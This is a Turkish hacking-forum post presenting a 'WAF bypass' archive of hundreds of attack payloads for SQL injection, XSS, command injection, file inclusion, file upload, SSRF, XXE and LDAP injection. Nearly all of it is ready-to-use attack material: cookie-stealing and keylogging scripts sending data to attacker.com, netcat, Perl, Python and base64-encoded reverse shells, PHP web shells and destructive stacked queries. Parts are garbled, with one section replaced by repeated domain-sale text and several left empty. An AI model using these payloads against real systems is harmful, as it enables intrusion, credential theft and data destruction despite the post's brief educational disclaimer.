⌘K
Duyuru
Duyurular

🛡️ WAF BYPASS ULTİMATE ARŞİV – 500+ PAYLOAD, 50+ TEKNİK

Tc4dy

🛡️ WAF BYPASS ULTİMATE ARŞİV – 500+ PAYLOAD, 50+ TEKNİK 📌 İÇİNDEKİLER SQL Injection WAF Bypass (150+ payload) XSS WAF Bypass (100+ payload) Command Injection WAF Bypass (80+...

🛡️ WAF BYPASS ULTİMATE ARŞİV – 500+ PAYLOAD, 50+ TEKNİK​


📌 İÇİNDEKİLER​

  1. SQL Injection WAF Bypass (150+ payload)
  2. XSS WAF Bypass (100+ payload)
  3. Command Injection WAF Bypass (80+ payload)
  4. LFI/RFI WAF Bypass (70+ payload)
  5. File Upload WAF Bypass (60+ payload)
  6. SSRF WAF Bypass (40+ payload)
  7. XXE WAF Bypass (30+ payload)
  8. LDAP Injection WAF Bypass (20+ payload)

1. SQL INJECTION WAF BYPASS (150+)​

1.1. Case Variation (Büyük/Küçük Harf)​

sql
UnIoN SeLeCt 1,2,3
UnIoN aLl SeLeCt 1,2,3
uNiOn sElEcT 1,2,3
UNION SELECT 1,2,3
Union Select 1,2,3
uNION sELECT 1,2,3

1.2. URL Encoding (Tek Katman)​

sql
%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31
%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2d%2d
%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2d%2d

1.3. Double URL Encoding​

sql
%2527%2520%2555%254e%2549%254f%254e%2520%2553%2545%254c%2545%2543%2554%2520%2531
%2527%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2533%252d%252d
%2527%2520%252f%252a%252a%252f%2575%256e%2569%256f%256e%252f%252a%252a%252f%2573%2565%256c%2565%2563%2574%252f%252a%252a%252f%2531

1.4. Triple URL Encoding​

sql
%252527%252520%252555%25254e%252549%25254f%25254e%252520%252553%252545%25254c%252545%252543%252554%252520%252531

1.5. Unicode Encoding​

sql
%u0027%u0020%u0055%u004e%u0049%u004f%u004e%u0020%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0031
%uff07%uff20%uff35%uff2e%uff29%uff2f%uff2e%uff20%uff33%uff25%uff2c%uff25%uff23%uff34%uff20%uff11

1.6. Hex Encoding​

sql
0x756e696f6e2073656c6563742031
0x273d2731
0x27206f72202731273d2731
0x27206f7220313d312d2d
0x27206f7220313d312023
0x2720616e6420313d312d2d
0x2720616e6420313d312023

1.7. Binary Encoding​

sql
0b111010101101110011010010110111101101110001000000111001101100101011011000110010101100011011101000010000000110001

1.8. Octal Encoding​

sql
\125\116\111\117\116\040\123\105\114\105\103\124\040\61

1.9. Comment Bypass (Çoklu)​

sql
/**/union/**/select/**/1,2,3
/*!union*//*!select*/1,2,3
/*!50000union*//*!50000select*/1,2,3
/*!uNiOn*//*!sElEcT*/1,2,3
/******/union/******/select/******/1,2,3
/*!12345union*//*!12345select*/1,2,3
/*!0union*//*!0select*/1,2,3

1.10. Nested Comment​

sql
/*!union/*/*/*/select*/1,2,3
/*!union/*!select*/1,2,3*/
/*!union/*!select*/*/1,2,3

1.11. Space Bypass (Çeşitli)​

sql
union%0aselect%0a1,2,3
union%0dselect%0d1,2,3
union%09select%091,2,3
union%0bselect%0b1,2,3
union%0cselect%0c1,2,3
union%20select%201,2,3
union%a0select%a01,2,3
union%00select%001,2,3
union%0d%0aselect%0d%0a1,2,3
union%09%0d%0aselect%09%0d%0a1,2,3

1.12. Alternative Space Characters​

sql
union%80select%801,2,3
union%81select%811,2,3
union%82select%821,2,3
union%83select%831,2,3
union%84select%841,2,3
union%85select%851,2,3
union%86select%861,2,3
union%87select%871,2,3
union%88select%881,2,3
union%89select%891,2,3
union%8aselect%8a1,2,3
union%8bselect%8b1,2,3
union%8cselect%8c1,2,3
union%8dselect%8d1,2,3
union%8eselect%8e1,2,3
union%8fselect%8f1,2,3
union%90select%901,2,3
union%91select%911,2,3
union%92select%921,2,3
union%93select%931,2,3
union%94select%941,2,3
union%95select%951,2,3
union%96select%961,2,3
union%97select%971,2,3
union%98select%981,2,3
union%99select%991,2,3
union%9aselect%9a1,2,3
union%9bselect%9b1,2,3
union%9cselect%9c1,2,3
union%9dselect%9d1,2,3
union%9eselect%9e1,2,3
union%9fselect%9f1,2,3

1.13. Taban (Tab) Bypass​

sql
union select 1,2,3
union select 1,2,3
union select 1,2,3

1.14. Line Break Bypass​

sql
union%0Aselect%0A1,2,3
union%0Dselect%0D1,2,3
union%0A%0Dselect%0A%0D1,2,3
union%0D%0Aselect%0D%0A1,2,3
union%0A%0A%0Aselect%0A%0A%0A1,2,3

1.15. Null Byte Bypass​

sql
union%00select%001,2,3
%00'%00%20%00union%00%20%00select%00%20%001,2,3%00

1.16. Scientific Notation Bypass​

sql
1e0union select 1,2,3
1.0union select 1,2,3
1.union select 1,2,3

1.17. Parenthesis Bypass​

sql
(union)select 1,2,3
union(select 1,2,3)
union select(1,2,3)
(union)(select)(1,2,3)

1.18. Backticks Bypass (MySQL)​

sql
`union` `select` 1,2,3
union`select`1,2,3
`union`select 1,2,3

1.19. Quotes Bypass​

sql
''union select 1,2,3
""union select 1,2,3
``union select 1,2,3

1.20. Math Operations Bypass​

sql
1+1union select 1,2,3
2-1union select 1,2,3
2*1union select 1,2,3
2/1union select 1,2,3

1.21. Boolean Bypass (WAF Atlatma için)​

sql
'||'1'||'='||'1
'%26%26'1'%3d'1
'%20%26%26%20'1'%3d'1
'%20%7c%7c%20'1'%3d'1
'%20%6f%72%20'1'%3d'1
'%20%6f%72%20%31%3d%31
'%20%61%6e%64%20%31%3d%31
'%20%61%6e%64%20%31%3d%32
'%20%6f%72%20%31%3d%32

1.22. Operator Bypass​

sql
' xor 1=1--
' xor 1=2--
' && 1=1--
' && 1=2--
' || 1=1--
' || 1=2--
' & 1=1--
' & 1=2--
' | 1=1--
' | 1=2--
' ^ 1=1--
' ^ 1=2--
' << 1=1--
' >> 1=1--
' ~ 1=1--

1.23. Time Based WAF Bypass​

sql
'%20%26%26%20sleep(5)%3d'1
'%20%7c%7c%20sleep(5)%3d'1
'%20%6f%72%20sleep(5)%3d'1
'%20%61%6e%64%20sleep(5)%3d'1
'%20%26%26%20BENCHMARK(10000000,MD5(1))%3d'1
'%20%7c%7c%20BENCHMARK(10000000,MD5(1))%3d'1
'%20%6f%72%20BENCHMARK(10000000,MD5(1))%3d'1
'%20%61%6e%64%20BENCHMARK(10000000,MD5(1))%3d'1

1.24. Error Based WAF Bypass​

sql
'%20%26%26%20extractvalue(1,concat(0x7e,database()))%3d'1
'%20%7c%7c%20extractvalue(1,concat(0x7e,database()))%3d'1
'%20%6f%72%20extractvalue(1,concat(0x7e,database()))%3d'1
'%20%61%6e%64%20extractvalue(1,concat(0x7e,database()))%3d'1
'%20%26%26%20updatexml(1,concat(0x7e,database()),1)%3d'1
'%20%7c%7c%20updatexml(1,concat(0x7e,database()),1)%3d'1
'%20%6f%72%20updatexml(1,concat(0x7e,database()),1)%3d'1
'%20%61%6e%64%20updatexml(1,concat(0x7e,database()),1)%3d'1

1.25. Stacked Queries WAF Bypass​

sql
';%20DROP%20TABLE%20users;--
';%20INSERT%20INTO%20admin%20VALUES('hacker','pass');--
';%20UPDATE%20users%20SET%20password='hacked'%20WHERE%20username='admin';--
';%20SELECT%20*%20INTO%20OUTFILE%20'/var/www/shell.php'%20FROM%20(SELECT%20'%3C?php%20system($_GET[%22c%22]);%20?%3E')a;--
';%20EXEC%20xp_cmdshell('id');--
';%20EXEC%20master..xp_cmdshell('id');--
';%20EXEC%20xp_regread('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','ProgramFilesDir');--

1.26. Order By Bypass​

sql
'/**/order/**/by/**/1--
'/**/order/**/by/**/2--
'/**/order/**/by/**/3--
'%20order%20by%201--
'%20order%20by%202--
'%20order%20by%203--
'%20order%20by%201%2c2%2c3--

1.27. Information Schema Bypass​

sql
union select 1,2,table_name from/*/*/information_schema.tables
union select 1,2,column_name from/*/*/information_schema.columns where table_name='users'
union select 1,2,schema_name from/*/*/information_schema.schemata

1.28. Database Function Bypass​

sql
database() -> db_name()
version() -> @@version
user() -> current_user()
user() -> system_user()
user() -> session_user()
@@datadir -> @@datadir
@@hostname -> @@hostname

1.29. WAF Logic Bypass​

sql
1'/*!00000or*/1=1-- -
1'/*!00000or*/1=1#
1'/*!00000and*/1=1-- -
1'/*!00000and*/1=2-- -
1'/*!00000or*/1=2-- -
1'/*!00000xor*/1=1-- -

1.30. HTTP Parameter Pollution (HPP)​

sql
id=1&id=2
id=1&id=2' union select 1,2,3
id=1&id=1' union select 1,2,3
id=1&id=1' and 1=1

1.31. HTTP Parameter Fragmentation​

sql
id=1' uni//on sel//ect 1,2,3
id=1' un//ion se//lect 1,2,3
id=1' un/**/ion se/**/lect 1,2,3

2. XSS WAF BYPASS (100+)​

2.1. Case Variation​

html
<ScRiPt>alert(1)</sCrIpT>
<ImG sRc=x OnErRoR=alert(1)>
<SvG oNlOaD=alert(1)>
<bOdY oNlOaD=alert(1)>
<iNpUt oNfOcUs=alert(1) aUtOfOcUs>

2.2. Double Case (Karışık)​

html
<ScRiPt>AlErT(1)</ScRiPt>
<ImG sRc=x OnErRoR=AlErT(1)>
<SvG oNlOaD=AlErT(1)>

2.3. URL Encoding (Tek)​

html
%3Cscript%3Ealert(1)%3C/script%3E
%3Cimg%20src=x%20onerror=alert(1)%3E
%3Csvg%20onload=alert(1)%3E

2.4. Double URL Encoding​

html
%253Cscript%253Ealert(1)%253C/script%253E
%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E
%253Csvg%2520onload%253Dalert(1)%253E

2.5. Hex Encoding (HTML)​

html
&#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x3C;&#x2F;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;
&#x3C;&#x69;&#x6D;&#x67;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x78;&#x20;&#x6F;&#x6E;&#x65;&#x72;&#x72;&#x6F;&#x72;&#x3D;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x3E;

2.6. Decimal Encoding (HTML)​

html
&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;
&#60;&#105;&#109;&#103;&#32;&#115;&#114;&#99;&#61;&#120;&#32;&#111;&#110;&#101;&#114;&#114;&#111;&#114;&#61;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#62;

2.7. Mixed Encoding (HTML+URL)​

html
&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;
%3Cscript&#x3E;alert(1)%3C/script&#x3E;

2.8. Unicode Encoding (JS)​

html
<script>\u0061\u006c\u0065\u0072\u0074(1)</script>
<img src=x onerror=\u0061\u006c\u0065\u0072\u0074(1)>
<svg onload=\u0061\u006c\u0065\u0072\u0074(1)>

2.9. Hexadecimal JS Encoding​

html
<script>\x61\x6c\x65\x72\x74(1)</script>
<img src=x onerror=\x61\x6c\x65\x72\x74(1)>
<svg onload=\x61\x6c\x65\x72\x74(1)>

2.10. Octal JS Encoding​

html
<script>\141\154\145\162\164(1)</script>
<img src=x onerror=\141\154\145\162\164(1)>

2.11. Event Handler Bypass (Çoklu)​

html
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<iframe onload=alert(1)>
<embed onload=alert(1)>
<link onload=alert(1)>
<video onloadstart=alert(1)>
<audio onloadstart=alert(1)>
<marquee onstart=alert(1)>
<details ontoggle=alert(1)>
<meter onmouseover=alert(1)>
<progress onmouseover=alert(1)>
<object onerror=alert(1)>

2.12. Space Bypass (Event Handler)​

html
<img/src=x/onerror=alert(1)>
<img%0Asrc=x%0Aonerror=alert(1)>
<img%09src=x%09onerror=alert(1)>
<img%0dsrc=x%0donerror=alert(1)>
<img%0asrc=x%0a%0aonerror=alert(1)>

2.13. Quote Bypass​

html
<img src=x onerror=alert(1)>
<img src=x onerror=alert`1`>
<img src=x onerror=alert(1)>
<img src=x onerror=alert`1`>
<img src=x onerror=alert(1)>
<img src=x onerror=alert`1`>

2.14. Parenthesis Bypass​

html
<img src=x onerror=alert`1`>
<img src=x onerror=alert(1)>
<img src=x onerror=alert(1)>
<img src=x onerror=alert`1`>

2.15. New Line Bypass​

html
<img%0Asrc=x%0Aonerror=alert(1)>
<svg%0Aonload=alert(1)>
<body%0Aonload=alert(1)>

2.16. Tab Bypass​

html
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>

2.17. Null Byte Bypass​

html
<%00script%00>alert(1)<%00/script%00>
<%00img%00src=x%00onerror=alert(1)%00>

2.18. Filter Evasion (String Concatenation)​

html
<script>al('er' + 't')(1)</script>
<script>al('er','t')(1)</script>
<script>al('er'/'t')(1)</script>
<script>al('er'.concat('t'))(1)</script>

2.19. Filter Evasion (Window Object)​

html
<script>window['alert'](1)</script>
<script>window['al' + 'ert'](1)</script>
<script>window['a'+'l'+'e'+'r'+'t'](1)</script>

2.20. Filter Evasion (Self)​

html
<script>self['alert'](1)</script>
<script>self['al' + 'ert'](1)</script>

2.21. Filter Evasion (This)​

html
<script>this['alert'](1)</script>
<script>this['al' + 'ert'](1)</script>

2.22. Filter Evasion (Top)​

html
<script>top['alert'](1)</script>
<script>parent['alert'](1)</script>
<script>frames['alert'](1)</script>

2.23. Filter Evasion (Function)​

html
<script>Function('alert(1)')()</script>
<script>['alert'].map(e=>eval(e+'(1)'))()</script>
<script>[].map.call`${'alert'}${'(1)'}`</script>

2.24. Filter Evasion (Eval)​

html
<script>eval('alert(1)')</script>
<script>eval(atob('YWxlcnQoMSk='))</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>

2.25. Cookie Stealer Payload​

html
<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>
<img src=x onerror="fetch('http://attacker.com/steal?c='+document.cookie)">
<svg onload="fetch('http://attacker.com/steal?c='+document.cookie)">
<script>new Image().src='http://attacker.com/steal?c='+document.cookie</script>

2.26. Keylogger Payload​

html
<script>
document.onkeypress = function(e) {
fetch('http://attacker.com/keylog?k=' + e.key);
}
</script>

3. COMMAND INJECTION WAF BYPASS (80+)​

3.1. New Line Bypass​

bash
%0aid%0a
%0aid%0a%0a
%0Aid%0A
%0Aid%0A%0A
%0aid%0a%23
%0Aid%0A%23

3.2. Carriage Return Bypass​

bash
%0did%0d
%0did%0d%0d
%0Did%0D

3.3. Line Feed + Carriage Return​

bash
%0a%0did%0a%0d
%0a%0did%0a%0d%23

3.4. Tab Bypass​

bash
%09id%09
%09id%09%09
%09id%09%23

3.5. Vertical Tab Bypass​

bash
%0bid%0b
%0bid%0b%0b
%0bid%0b%23

3.6. Form Feed Bypass​

bash
%0cid%0c
%0cid%0c%0c
%0cid%0c%23

3.7. Space Bypass (IFS)​

bash
;${IFS}id
;${IFS}id${IFS}
;${IFS}id${IFS}|${IFS}nc${IFS}10.0.0.1${IFS}8080
;${IFS}id${IFS}&&${IFS}nc${IFS}10.0.0.1${IFS}8080${IFS}-e${IFS}/bin/sh

3.8. IFS Variable Bypass​

bash
;${IFS}id
;${IFS}id${IFS}
;${IFS}id${IFS};${IFS}nc${IFS}10.0.0.1${IFS}8080${IFS}-e${IFS}/bin/sh
;${IFS}id${IFS}|${IFS}nc${IFS}10.0.0.1${IFS}8080${IFS}-e${IFS}/bin/sh

3.9. Comment Bypass​

bash
;id#%0a
;id/*%0a*/
;id/*%0a*/|/*%0a*/nc/*%0a*/10.0.0.1/*%0a*/8080/*%0a*/-e/*%0a*/bin/sh

3.10. URL Encoding (Special Chars)​

bash
%3bid%0a
%7cid%0a
%26id%0a
%26%26id%0a
%7c%7cid%0a

3.11. Double URL Encoding​

bash
%253bid%250a
%253bid%250a%2523
%253Bid%250A%2523

3.12. Hex Encoding​

bash
\x3bid\x0a
\x7cid\x0a
\x26id\x0a
\x3b\x69\x64\x0a

3.13. Octal Encoding​

bash
\073id\012
\073\151\144\012

3.14. Wildcard Bypass​

bash
/?in/?/whoami
/?in/?/nc 10.0.0.1 8080 -e /?in/?/sh
/???/nc 10.0.0.1 8080 -e /???/sh

3.15. Environment Variable Bypass​

bash
${PATH:0:1}id
${PATH:0:1}usr${PATH:0:1}bin${PATH:0:1}id
${PATH:0:1}bin${PATH:0:1}sh

3.16. Substring Bypass​

bash
${PATH:0:1}bin${PATH:0:1}sh
${PATH:0:1}usr${PATH:0:1}bin${PATH:0:1}nc

3.17. Command Substitution Bypass​

bash
`id`
$(id)
`{id}`
$({id})

3.18. Reverse Shell Base64 Bypass​

bash
echo "bmMgMTI3LjAuMC4xIDQ0NDQgLWUgL2Jpbi9zaAo=" | base64 -d | bash
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS84MDgwIDA+JjE=" | base64 -d | bash

3.19. Perl Reverse Shell​

bash
perl -e 'use Socket;$i="10.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

3.20. Python Reverse Shell​

bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

4. LFI/RFI WAF BYPASS (70+)​

4.1. Path Traversal (Basic)​

sql
../../../../etc/passwd
....//....//....//etc/passwd
..\..\..\..\windows\win.ini
....\\....\\....\\windows\\win.ini

4.2. URL Encoding (Tek)​

sql
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini

4.3. Double URL Encoding​

sql
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini

4.4. Triple URL Encoding​

sql
%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252fetc%25252fpasswd

4.5. Unicode Encoding​

sql
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%e0%40%ae%e0%40%ae%e0%40%af%e0%40%ae%e0%40%ae%e0%40%af%e0%40%ae%e0%40%ae%e0%40%afetc%e0%40%afpasswd

4.6. UTF-8 Overflow​

sql
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd

4.7. Null Byte Bypass​

sql
../../../../etc/passwd%00
../../../../etc/passwd%00.jpg
../../../../windows/win.ini%00
../../../../windows/win.ini%00.txt

4.8. Double Null Byte​

sql
../../../../etc/passwd%00%00
../../../../etc/passwd%00%00.jpg

4.9. PHP Wrapper Bypass​

sql
php://filter/convert.base64-encode/resource=../../../../etc/passwd
php://filter/read=convert.base64-encode/resource=config.php
php://filter/convert.base64-encode/resource=../../../../etc/passwd%00
php://filter/string.tolower/resource=config.php
php://filter/string.rot13/resource=config.php
php://filter/zlib.deflate/resource=config.php
php://filter/zlib.inflate/resource=config.php

4.10. Data Wrapper Bypass​

sql
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=
data://text/plain,<?php system($_GET['c']); ?>

4.11. Expect Wrapper Bypass​

sql
expect://id
expect://ls
expect://whoami

4.12. Input Wrapper Bypass​

sql
php://input
php://input%00

4.13. Zip Wrapper Bypass​

sql
zip://shell.jpg%23shell.php
zip://../../../../var/www/html/shell.jpg%23shell.php

4.14. Phar Wrapper Bypass​

sql
phar://shell.phar/shell.php
phar://../../../../var/www/html/shell.phar/shell.php

4.15. RFI Bypass (Remote)​

sql

Attacker - The Domain Name Attacker.com is Now For Sale.

Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
attacker.com

Attacker - The Domain Name Attacker.com is Now For Sale.

Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
attacker.com

Attacker - The Domain Name Attacker.com is Now For Sale.

Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
attacker.com

Attacker - The Domain Name Attacker.com is Now For Sale.

Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
attacker.com

4.16. SMB RFI Bypass​

sql
\\attacker.com\share\shell.php
//attacker.com/share/shell.php
smb://attacker.com/share/shell.php

4.17. FTP RFI Bypass​

sql
ftp://attacker.com/shell.php
ftps://attacker.com/shell.php

4.18. Data RFI Bypass​

sql
http://attacker.com/data:<?php system($_GET['c']); ?>
https://attacker.com/data:<?php system($_GET['c']); ?>

4.19. Shortcut Bypass (Windows)​

sql
....\....\....\windows\win.ini
..../..../..../windows/win.ini

4.20. Encoded Path Bypass​

sql
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%5c%2e%2e%5c%2e%2e%5c%77%69%6e%64%6f%77%73%5c%77%69%6e%2e%69%6e%69

5. FILE UPLOAD WAF BYPASS (60+)​

5.1. Double Extension​

text
shell.php.jpg
shell.php.jpeg
shell.php.png
shell.php.gif
shell.php;.jpg
shell.php;.jpeg
shell.php;.png
shell.php;.gif
shell.php%00.jpg
shell.php%00.jpeg
shell.php%00.png
shell.php%00.gif
shell.php.xyz.jpg
shell.php.txt.jpg

5.2. Case Variation​

text
shell.PHP.jpg
shell.PhP.jpg
shell.PHP.jpeg
shell.PhP.jpeg
shell.PHP.png
shell.PhP.png

5.3. Reverse Double Extension​

text
shell.jpg.php
shell.jpg.php5
shell.jpg.phtml
shell.jpg.phar
shell.jpg.php3
shell.jpg.php4
shell.jpg.php7

5.4. Content-Type Bypass​

text
Content-Type: image/jpeg
Content-Type: image/png
Content-Type: image/gif
Content-Type: image/bmp
Content-Type: image/webp
Content-Type: image/svg+xml

5.5. Magic Bytes Bypass (JPEG)​

php
ÿØÿà JFIF
ÿØÿá Exif
ÿØÿâ
ÿØÿã
ÿØÿä
ÿØÿå

5.6. Magic Bytes Bypass (PNG)​

php
%PNG
‰PNG

5.7. Magic Bytes Bypass (GIF)​

php
GIF89a;
GIF87a;

5.8. Magic Bytes Bypass (BMP)​

php
BM

5.9. Magic Bytes Bypass (TIFF)​

php
II*
MM*

5.10. Magic Bytes + PHP Code​

php
GIF89a;
<?php system($_GET['c']); ?>
php
%PNG
<?php system($_GET['c']); ?>
php
ÿØÿà JFIF
<?php system($_GET['c']); ?>

5.11. Multi Magic Bytes​

php
GIF89a;%PNGÿØÿà JFIF
<?php system($_GET['c']); ?>

5.12. .htaccess Bypass​

apache
AddType application/x-httpd-php .jpg
AddType application/x-httpd-php .png
AddType application/x-httpd-php .gif
AddHandler application/x-httpd-php .jpg

5.13. .user.ini Bypass​

ini
auto_prepend_file = shell.jpg
auto_append_file = shell.jpg

5.14. Filename Null Byte (Old Systems)​

php
shell.php\0.jpg
shell.php%00.jpg
shell.php%00.jpeg

5.15. Chunked Upload Bypass​

text
POST /upload.php HTTP/1.1
Transfer-Encoding: chunked

9
shell.php
0

5.16. Large Payload Padding​

text
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... (20KB) ...<?php system($_GET['c']); ?>

5.17. MIME Type + Extension Mismatch​

php
Content-Type: image/jpeg
shell.php.jpg

5.18. Filename without Extension​

text
shell
shell.
shell.php.
shell.php.

5.19. Unicode Filename​

text
%73%68%65%6c%6c%2e%70%68%70%2e%6a%70%67
shell%u002ephp%u002ejpg

5.20. Space in Filename​

text
shell .php.jpg
shell .php .jpg
shell. php.jpg

6. SSRF WAF BYPASS (40+)​

6.1. Localhost Bypass​

sql
http://[::1]
http://[::]

6.2. Decimal IP Bypass​

sql
http://2130706433 (127.0.0.1)
http://3232235521 (192.168.1.1)
http://167772160 (10.0.0.0)

6.3. Octal IP Bypass​

sql

6.4. Hexadecimal IP Bypass​

sql

6.5. Dword IP Bypass​

sql

6.6. Mixed IP Format Bypass​

sql

6.7. URL Redirect Bypass​

sql

6.8. DNS Rebinding Bypass​

sql

6.9. Alternative Schemes​

sql
file:///etc/passwd
file:///c:/windows/win.ini
dict://localhost:11211/info
gopher://localhost:8080/_GET%20/index.html%20HTTP/1.1

6.10. Gopher Bypass (Redis/Memcached)​

sql
gopher://127.0.0.1:6379/_*2%0d%0a$4%0d%0aINFO%0d%0a
gopher://127.0.0.1:11211/_stats

6.11. FTP Bypass​

sql
ftp://127.0.0.1:21
ftp://localhost:21

6.12. SFTP Bypass​

sql
sftp://127.0.0.1:22
sftp://localhost:22

6.13. AWS Metadata Bypass​

sql

6.14. GCP Metadata Bypass​

sql

6.15. Azure Metadata Bypass​

sql

6.16. Protocol Smuggling Bypass​

sql
http://127.0.0.1:[email protected]

7. XXE WAF BYPASS (30+)​

7.1. Basic XXE​

xml
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>

7.2. Parameter Entity Bypass​

xml
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY % remote SYSTEM "http://attacker.com/xxe.dtd">%remote;]>
<root/>

7.3. UTF-16 Bypass​

xml
<?xml version="1.0" encoding="UTF-16"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>

7.4. UTF-32 Bypass​

xml
<?xml version="1.0" encoding="UTF-32"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>

7.5. ISO-8859-1 Bypass​

xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>

7.6. CDATA Bypass​

xml
<!DOCTYPE root [<!ENTITY % start "<![CDATA["> <!ENTITY % xxe SYSTEM "file:///etc/passwd"> <!ENTITY % end "]]>"> %start;%xxe;%end;]>
<root/>

7.7. Base64 Bypass​

xml
<!DOCTYPE root [<!ENTITY % xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]>
<root>%xxe;</root>

7.8. PHP Wrapper Bypass​

xml
<!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=config.php">]>
<root>&xxe;</root>

7.9. Expect Bypass​

xml
<!DOCTYPE root [<!ENTITY xxe SYSTEM "expect://id">]>
<root>&xxe;</root>

7.10. Out-of-Band (OOB) Bypass​

xml
<!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://attacker.com/oob">%xxe;]>
<root/>

7.11. XML Schema Bypass​

xml
<!DOCTYPE root [
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/schema.dtd">
%dtd;
]>
<root/>

8. LDAP INJECTION WAF BYPASS (20+)​

8.1. Basic Bypass​

ldap
*)(uid=*
*)(|(uid=*
*)(|(cn=*
*)(|(sn=*
*)(|(mail=*
*)(|(ou=*
*)(|(dc=*

8.2. AND/OR Bypass​

ldap
*)(&(uid=*)
*)(|(uid=*)
*)(!(!(uid=*))
*)(&(cn=*)(uid=*))
*)(|(cn=*)(uid=*))

8.3. Null Bypass​

ldap
%00*)(uid=*
%00*)(|(uid=*
%00*)(&(uid=*

8.4. Comment Bypass​

ldap
*)(uid=*)#
*)(|(uid=*)#
*)(&(uid=*)#
*)(!(!(uid=*)))#

8.5. Space Bypass​

ldap
*)(uid=*)
*)(|(uid=*))
*)(&(uid=*))
*)(!(uid=*))

🎯 ÖZET TABLOSU​



KategoriPayload SayısıEn Etkili Teknik
SQLi150+Double URL Encoding + Comment
XSS100+HTML Entity + Event Handler
Command Injection80+IFS Variable + New Line
LFI/RFI70+Double URL Encoding + Wrapper
File Upload60+Magic Bytes + Double Extension
SSRF40+Decimal IP + Redirect
XXE30+Parameter Entity + UTF-16
LDAP20+Basic Bypass + Comment

📢 SON SÖZ​

Bu arşivdeki payload'ların tamamı eğitim ve güvenlik testi amaçlıdır. İzinsiz sistemlerde kullanmayın. Her WAF farklıdır, tek bir payload her zaman işe yaramaz. Deneyerek hangi tekniğin işe yaradığını bulmanız gerekir.

@Tc4dy | github.com/tc4dy
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
Yanıt için giriş yapmanız veya üye olmanız gerekir.
132,932Konular
3,280,504Mesajlar
318,321Kullanıcılar
feeisjSon Üye

About Us & Legal Notice

